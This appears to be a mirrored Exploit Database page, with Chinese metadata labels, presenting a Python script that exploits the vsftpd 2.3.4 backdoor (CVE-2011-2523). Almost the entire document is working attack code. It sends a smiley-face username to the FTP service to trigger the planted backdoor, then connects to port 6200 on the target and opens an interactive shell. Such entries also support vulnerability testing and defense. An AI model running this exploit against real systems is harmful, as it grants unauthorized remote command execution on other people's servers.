vsftpd 2.3.4 – Backdoor Command Execution

• Exploit Database
• 14 阅读

• 作者： HerculesRD
  日期： 2021-04-12
• 类别：

  • remote
  平台：

  • unix
• 来源：https://www.exploit-db.com/exploits/49757/

• # Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
  # Date: 9-04-2021
  # Exploit Author: HerculesRD
  # Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
  # Version: vsftpd 2.3.4
  # Tested on: debian
  # CVE : CVE-2011-2523
  
  #!/usr/bin/python3 
   
  from telnetlib import Telnet 
  import argparse
  from signal import signal, SIGINT
  from sys import exit
  
  def handler(signal_received, frame):
  # Handle any cleanup here
  print(' [+]Exiting...')
  exit(0)
  
  signal(SIGINT, handler) 
  parser=argparse.ArgumentParser()
  parser.add_argument("host", help="input the address of the vulnerable host", type=str)
  args = parser.parse_args() 
  host = args.host
  portFTP = 21 #if necessary edit this line
  
  user="USER nergal:)"
  password="PASS pass"
  
  tn=Telnet(host, portFTP)
  tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
  tn.write(user.encode('ascii') + b"\n")
  tn.read_until(b"password.") #if necessary, edit this line
  tn.write(password.encode('ascii') + b"\n")
  
  tn2=Telnet(host, 6200)
  print('Success, shell opened')
  print('Send `exit` to quit shell')
  tn2.interact()